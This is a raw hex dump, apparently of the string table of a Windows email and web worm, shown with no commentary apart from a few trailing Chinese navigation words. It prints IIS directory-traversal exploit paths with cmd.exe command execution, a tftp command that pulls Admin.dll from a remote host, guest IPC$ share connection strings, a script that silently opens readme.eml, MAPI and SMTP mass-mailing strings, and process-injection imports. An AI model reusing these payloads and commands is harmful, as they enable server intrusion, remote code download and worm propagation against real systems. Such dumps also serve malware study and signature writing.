:36179B08 2F 64 00 00 2F 73 63 72 /d../scr
:36179B10 69 70 74 73 2F 2E 2E 25 ipts/..%
:36179B18 32 35 35 63 2E 2E 00 00 255c....
:36179B20 2F 5F 76 74 69 5F 62 69 /_vti_bi
:36179B28 6E 2F 2E 2E 25 32 35 35 n/..%255
:36179B30 63 2E 2E 2F 2E 2E 25 32 c../..%2
:36179B38 35 35 63 2E 2E 2F 2E 2E 55c../..
:36179B40 25 32 35 35 63 2E 2E 00 %255c...
:36179B48 2F 5F 6D 65 6D 5F 62 69 /_mem_bi
:36179B50 6E 2F 2E 2E 25 32 35 35 n/..%255
:36179B58 63 2E 2E 2F 2E 2E 25 32 c../..%2
:36179B60 35 35 63 2E 2E 2F 2E 2E 55c../..
:36179B68 25 32 35 35 63 2E 2E 00 %255c...
:36179B70 2F 6D 73 61 64 63 2F 2E /msadc/.
:36179B78 2E 25 32 35 35 63 2E 2E .%255c..
:36179B80 2F 2E 2E 25 32 35 35 63 /..%255c
:36179B88 2E 2E 2F 2E 2E 25 32 35 ../..%25
:36179B90 35 63 2F 2E 2E 25 63 31 5c/..%c1
:36179B98 25 31 63 2E 2E 2F 2E 2E %1c../..
:36179BA0 25 63 31 25 31 63 2E 2E %c1%1c..
:36179BA8 2F 2E 2E 25 63 31 25 31 /..%c1%1
:36179BB0 63 2E 2E 00 2F 73 63 72 c.../scr
:36179BB8 69 70 74 73 2F 2E 2E 25 ipts/..%
:36179BC0 63 31 25 31 63 2E 2E 00 c1%1c...
:36179BC8 2F 73 63 72 69 70 74 73 /scripts
:36179BD0 2F 2E 2E 25 63 30 25 32 /..%c0%2
:36179BD8 66 2E 2E 00 2F 73 63 72 f.../scr
:36179BE0 69 70 74 73 2F 2E 2E 25 ipts/..%
:36179BE8 63 30 25 61 66 2E 2E 00 c0%af...
:36179BF0 2F 73 63 72 69 70 74 73 /scripts
:36179BF8 2F 2E 2E 25 63 31 25 39 /..%c1%9
:36179C00 63 2E 2E 00 2F 73 63 72 c.../scr
:36179C08 69 70 74 73 2F 2E 2E 25 ipts/..%
:36179C10 25 33 35 25 36 33 2E 2E %35%63..
:36179C18 00 00 00 00 2F 73 63 72 ..../scr
:36179C20 69 70 74 73 2F 2E 2E 25 ipts/..%
:36179C28 25 33 35 63 2E 2E 00 00 %35c....
:36179C30 2F 73 63 72 69 70 74 73 /scripts
:36179C38 2F 2E 2E 25 32 35 25 33 /..%25%3
:36179C40 35 25 36 33 2E 2E 00 00 5%63....
:36179C48 2F 73 63 72 69 70 74 73 /scripts
:36179C50 2F 2E 2E 25 32 35 32 66 /..%252f
:36179C58 2E 2E 00 00 2F 72 6F 6F ..../roo
:36179C60 74 2E 65 78 65 3F 2F 63 t.exe?/c
:36179C68 2B 00 00 00 2F 77 69 6E +.../win
:36179C70 6E 74 2F 73 79 73 74 65 nt/syste
:36179C78 6D 33 32 2F 63 6D 64 2E m32/cmd.
:36179C80 65 78 65 3F 2F 63 2B 00 exe?/c+.
:36179C88 6E 65 74 25 25 32 30 75 net%%20u
:36179C90 73 65 25 25 32 30 5C 5C se%%20\\
:36179C98 25 73 5C 69 70 63 24 25 %s\ipc$%
:36179CA0 25 32 30 22 22 25 25 32 %20""%%2
:36179CA8 30 2F 75 73 65 72 3A 22 0/user:"
:36179CB0 67 75 65 73 74 22 00 00 guest"..
:36179CB8 74 66 74 70 25 25 32 30 tftp%%20
:36179CC0 2D 69 25 25 32 30 25 73 -i%%20%s
:36179CC8 25 25 32 30 47 45 54 25 %%20GET%
:36179CD0 25 32 30 41 64 6D 69 6E %20Admin
:36179CD8 2E 64 6C 6C 25 25 32 30 .dll%%20
:36179CE0 00 00 00 00 41 64 6D 69 ....Admi
:36179CE8 6E 2E 64 6C 6C 00 00 00 n.dll...
:36179CF0 63 3A 5C 41 64 6D 69 6E c:\Admin
:36179CF8 2E 64 6C 6C 00 00 00 00 .dll....
:36179D00 64 3A 5C 41 64 6D 69 6E d:\Admin
:36179D08 2E 64 6C 6C 00 00 00 00 .dll....
:36179D10 65 3A 5C 41 64 6D 69 6E e:\Admin
:36179D18 2E 64 6C 6C 00 00 00 00 .dll....
:36179D20 0D 0A 3C 68 74 6D 6C 3E ..<html>
:36179D28 3C 73 63 72 69 70 74 20 <script
:36179D30 6C 61 6E 67 75 61 67 65 language
:36179D38 3D 22 4A 61 76 61 53 63 ="JavaSc
:36179D40 72 69 70 74 22 3E 77 69 ript">wi
:36179D48 6E 64 6F 77 2E 6F 70 65 ndow.ope
:36179D50 6E 28 22 72 65 61 64 6D n("readm
:36179D58 65 2E 65 6D 6C 22 2C 20 e.eml",
:36179D60 6E 75 6C 6C 2C 20 22 72 null,"r
:36179D68 65 73 69 7A 61 62 6C 65 esizable
:36179D70 3D 6E 6F 2C 74 6F 70 3D =no,top=
:36179D78 36 30 30 30 2C 6C 65 66 6000,lef
:36179D80 74 3D 36 30 30 30 22 29 t=6000")
:36179D88 3C 2F 73 63 72 69 70 74 </script
:36179D90 3E 3C 2F 68 74 6D 6C 3E ></html>
:36179D98 00 00 00 00 2F 41 64 6D ..../Adm
:36179DA0 69 6E 2E 64 6C 6C 00 00 in.dll..
:36179DA8 64 69 72 00 47 45 54 20 dir.GET
:36179DB0 25 73 20 48 54 54 50 2F %s HTTP/
:36179DB8 31 2E 30 0D 0A 48 6F 73 1.0..Hos
:36179DC0 74 3A 20 77 77 77 0D 0A t: www..
:36179DC8 43 6F 6E 6E 6E 65 63 74 Connnect
:36179DD0 69 6F 6E 3A 20 63 6C 6F ion: clo
:36179DD8 73 65 0D 0A 0D 0A 00 00 se......
:36179DE0 63 3A 00 00 72 65 61 64 c:..read
:36179DE8 6D 65 00 00 6D 61 69 6E me..main
:36179DF0 00 00 00 00 69 6E 64 65 ....inde
:36179DF8 78 00 00 00 64 65 66 61 x...defa
:36179E00 75 6C 74 00 68 74 6D 6C ult.html
:36179E08 00 00 00 00 2E 61 73 70 .....asp
:36179E10 00 00 00 00 2E 68 74 6D .....htm
:36179E18 00 00 00 00 5C 72 65 61 ....\rea
:36179E20 64 6D 65 2E 65 6D 6C 00 dme.eml.
:36179E28 2E 65 78 65 00 00 00 00 .exe....
:36179E30 6D 65 70 00 77 69 6E 7A mep.winz
:36179E38 69 70 33 32 2E 65 78 65 ip32.exe
:36179E40 00 00 00 00 72 69 63 68 ....rich
:36179E48 65 64 32 30 2E 64 6C 6C ed20.dll
:36179E50 00 00 00 00 2E 6E 77 73 .....nws
:36179E58 00 00 00 00 2E 65 6D 6C .....eml
:36179E60 00 00 00 00 2E 64 6F 63 .....doc
:36179E68 00 00 00 00 20 2E 65 78 .... .ex
:36179E70 65 00 00 00 64 6F 6E 74 e...dont
:36179E78 72 75 6E 6F 6C 64 00 00 runold..
:36179E80 69 6F 63 74 6C 73 6F 63 ioctlsoc
:36179E88 6B 65 74 00 67 65 74 68 ket.geth
:36179E90 6F 73 74 62 79 6E 61 6D ostbynam
:36179E98 65 00 00 00 67 65 74 68 e...geth
:36179EA0 6F 73 74 6E 61 6D 65 00 ostname.
:36179EA8 69 6E 65 74 5F 6E 74 6F inet_nto
:36179EB0 61 00 00 00 69 6E 65 74 a...inet
:36179EB8 5F 61 64 64 72 00 00 00 _addr...
:36179EC0 6E 74 6F 68 6C 00 00 00 ntohl...
:36179EC8 68 74 6F 6E 6C 00 00 00 htonl...
:36179ED0 6E 74 6F 68 73 00 00 00 ntohs...
:36179ED8 68 74 6F 6E 73 00 00 00 htons...
:36179EE0 63 6C 6F 73 65 73 6F 63 closesoc
:36179EE8 6B 65 74 00 73 65 6C 65 ket.sele
:36179EF0 63 74 00 00 73 65 6E 64 ct..send
:36179EF8 74 6F 00 00 73 65 6E 64 to..send
:36179F00 00 00 00 00 72 65 63 76 ....recv
:36179F08 66 72 6F 6D 00 00 00 00 from....
:36179F10 72 65 63 76 00 00 00 00 recv....
:36179F18 62 69 6E 64 00 00 00 00 bind....
:36179F20 63 6F 6E 6E 65 63 74 00 connect.
:36179F28 73 6F 63 6B 65 74 00 00 socket..
:36179F30 5F 5F 57 53 41 46 44 49 __WSAFDI
:36179F38 73 53 65 74 00 00 00 00 sSet....
:36179F40 57 53 41 43 6C 65 61 6E WSAClean
:36179F48 75 70 00 00 57 53 41 53 up..WSAS
:36179F50 74 61 72 74 75 70 00 00 tartup..
:36179F58 77 73 32 5F 33 32 2E 64 ws2_32.d
:36179F60 6C 6C 00 00 4D 41 50 49 ll..MAPI
:36179F68 4C 6F 67 6F 66 66 00 00 Logoff..
:36179F70 4D 41 50 49 53 65 6E 64 MAPISend
:36179F78 4D 61 69 6C 00 00 00 00 Mail....
:36179F80 4D 41 50 49 46 72 65 65 MAPIFree
:36179F88 42 75 66 66 65 72 00 00 Buffer..
:36179F90 4D 41 50 49 52 65 61 64 MAPIRead
:36179F98 4D 61 69 6C 00 00 00 00 Mail....
:36179FA0 4D 41 50 49 46 69 6E 64 MAPIFind
:36179FA8 4E 65 78 74 00 00 00 00 Next....
:36179FB0 4D 41 50 49 52 65 73 6F MAPIReso
:36179FB8 6C 76 65 4E 61 6D 65 00 lveName.
:36179FC0 4D 41 50 49 4C 6F 67 6F MAPILogo
:36179FC8 6E 00 00 00 4D 41 50 49 n...MAPI
:36179FD0 33 32 2E 44 4C 4C 00 00 32.DLL..
:36179FD8 57 4E 65 74 41 64 64 43 WNetAddC
:36179FE0 6F 6E 6E 65 63 74 69 6F onnectio
:36179FE8 6E 32 41 00 57 4E 65 74 n2A.WNet
:36179FF0 43 61 6E 63 65 6C 43 6F CancelCo
:36179FF8 6E 6E 65 63 74 69 6F 6E nnection
:3617A000 32 41 00 00 57 4E 65 74 2A..WNet
:3617A008 4F 70 65 6E 45 6E 75 6D OpenEnum
:3617A010 41 00 00 00 57 4E 65 74 A...WNet
:3617A018 45 6E 75 6D 52 65 73 6F EnumReso
:3617A020 75 72 63 65 41 00 00 00 urceA...
:3617A028 57 4E 65 74 43 6C 6F 73 WNetClos
:3617A030 65 45 6E 75 6D 00 00 00 eEnum...
:3617A038 4D 50 52 2E 44 4C 4C 00 MPR.DLL.
:3617A040 53 68 65 6C 6C 45 78 65 ShellExe
:3617A048 63 75 74 65 41 00 00 00 cuteA...
:3617A050 53 48 45 4C 4C 33 32 2E SHELL32.
:3617A058 44 4C 4C 00 52 65 67 69 DLL.Regi
:3617A060 73 74 65 72 53 65 72 76 sterServ
:3617A068 69 63 65 50 72 6F 63 65 iceProce
:3617A070 73 73 00 00 56 69 72 74 ss..Virt
:3617A078 75 61 6C 46 72 65 65 45 ualFreeE
:3617A080 78 00 00 00 56 69 72 74 x...Virt
:3617A088 75 61 6C 51 75 65 72 79 ualQuery
:3617A090 45 78 00 00 56 69 72 74 Ex..Virt
:3617A098 75 61 6C 41 6C 6C 6F 63 ualAlloc
:3617A0A0 45 78 00 00 56 69 72 74 Ex..Virt
:3617A0A8 75 61 6C 50 72 6F 74 65 ualProte
:3617A0B0 63 74 45 78 00 00 00 00 ctEx....
:3617A0B8 43 72 65 61 74 65 52 65 CreateRe
:3617A0C0 6D 6F 74 65 54 68 72 65 moteThre
:3617A0C8 61 64 00 00 48 65 61 70 ad..Heap
:3617A0D0 43 6F 6D 70 61 63 74 00 Compact.
:3617A0D8 48 65 61 70 46 72 65 65 HeapFree
:3617A0E0 00 00 00 00 48 65 61 70 ....Heap
:3617A0E8 41 6C 6C 6F 63 00 00 00 Alloc...
:3617A0F0 48 65 61 70 44 65 73 74 HeapDest
:3617A0F8 72 6F 79 00 48 65 61 70 roy.Heap
:3617A100 43 72 65 61 74 65 00 00 Create..
:3617A108 4B 45 52 4E 45 4C 33 32 KERNEL32
:3617A110 2E 44 4C 4C 00 00 00 00 .DLL....
:3617A118 53 4F 46 54 57 41 52 45 SOFTWARE
:3617A120 5C 4D 69 63 72 6F 73 6F \Microso
:3617A128 66 74 5C 57 69 6E 64 6F ft\Windo
:3617A130 77 73 5C 43 75 72 72 65 ws\Curre
:3617A138 6E 74 56 65 72 73 69 6F ntVersio
:3617A140 6E 5C 41 70 70 20 50 61 n\App Pa
:3617A148 74 68 73 5C 00 00 00 00 ths\....
:3617A150 53 4F 46 54 57 41 52 45 SOFTWARE
:3617A158 5C 4D 69 63 72 6F 73 6F \Microso
:3617A160 66 74 5C 57 69 6E 64 6F ft\Windo
:3617A168 77 73 5C 43 75 72 72 65 ws\Curre
:3617A170 6E 74 56 65 72 73 69 6F ntVersio
:3617A178 6E 5C 41 70 70 20 50 61 n\App Pa
:3617A180 74 68 73 00 54 79 70 65 ths.Type
:3617A188 00 00 00 00 52 65 6D 61 ....Rema
:3617A190 72 6B 00 00 58 3A 5C 00 rk..X:\.
:3617A198 53 4F 46 54 57 41 52 45 SOFTWARE
:3617A1A0 5C 4D 69 63 72 6F 73 6F \Microso
:3617A1A8 66 74 5C 57 69 6E 64 6F ft\Windo
:3617A1B0 77 73 5C 43 75 72 72 65 ws\Curre
:3617A1B8 6E 74 56 65 72 73 69 6F ntVersio
:3617A1C0 6E 5C 4E 65 74 77 6F 72 n\Networ
:3617A1C8 6B 5C 4C 61 6E 4D 61 6E k\LanMan
:3617A1D0 5C 58 24 00 50 61 72 6D \X$.Parm
:3617A1D8 32 65 6E 63 00 00 00 00 2enc....
:3617A1E0 50 61 72 6D 31 65 6E 63 Parm1enc
:3617A1E8 00 00 00 00 46 6C 61 67 ....Flag
:3617A1F0 73 00 00 00 50 61 74 68 s...Path
:3617A1F8 00 00 00 00 53 4F 46 54 ....SOFT
:3617A200 57 41 52 45 5C 4D 69 63 WARE\Mic
:3617A208 72 6F 73 6F 66 74 5C 57 rosoft\W
:3617A210 69 6E 64 6F 77 73 5C 43 indows\C
:3617A218 75 72 72 65 6E 74 56 65 urrentVe
:3617A220 72 73 69 6F 6E 5C 4E 65 rsion\Ne
:3617A228 74 77 6F 72 6B 5C 4C 61 twork\La
:3617A230 6E 4D 61 6E 5C 00 00 00 nMan\...
:3617A238 53 4F 46 54 57 41 52 45 SOFTWARE
:3617A240 5C 4D 69 63 72 6F 73 6F \Microso
:3617A248 66 74 5C 57 69 6E 64 6F ft\Windo
:3617A250 77 73 5C 43 75 72 72 65 ws\Curre
:3617A258 6E 74 56 65 72 73 69 6F ntVersio
:3617A260 6E 5C 4E 65 74 77 6F 72 n\Networ
:3617A268 6B 5C 4C 61 6E 4D 61 6E k\LanMan
:3617A270 00 00 00 00 53 59 53 54 ....SYST
:3617A278 45 4D 5C 43 75 72 72 65 EM\Curre
:3617A280 6E 74 43 6F 6E 74 72 6F ntContro
:3617A288 6C 53 65 74 5C 53 65 72 lSet\Ser
:3617A290 76 69 63 65 73 5C 6C 61 vices\la
:3617A298 6E 6D 61 6E 73 65 72 76 nmanserv
:3617A2A0 65 72 5C 53 68 61 72 65 er\Share
:3617A2A8 73 00 00 00 0D 0A 00 00 s.......
:3617A2B0 43 61 63 68 65 00 00 00 Cache...
:3617A2B8 53 6F 66 74 77 61 72 65 Software
:3617A2C0 5C 4D 69 63 72 6F 73 6F \Microso
:3617A2C8 66 74 5C 57 69 6E 64 6F ft\Windo
:3617A2D0 77 73 5C 43 75 72 72 65 ws\Curre
:3617A2D8 6E 74 56 65 72 73 69 6F ntVersio
:3617A2E0 6E 5C 45 78 70 6C 6F 72 n\Explor
:3617A2E8 65 72 5C 4D 61 70 4D 61 er\MapMa
:3617A2F0 69 6C 00 00 51 55 49 54 il..QUIT
:3617A2F8 0D 0A 00 00 2E 0D 0A 00 ........
:3617A300 53 75 62 6A 65 63 74 3A Subject:
:3617A308 20 00 00 00 46 72 6F 6D ...From
:3617A310 3A 20 3C 00 44 41 54 41 : <.DATA
:3617A318 0D 0A 00 00 52 43 50 54 ....RCPT

相關詞條

熱門詞條

聯絡我們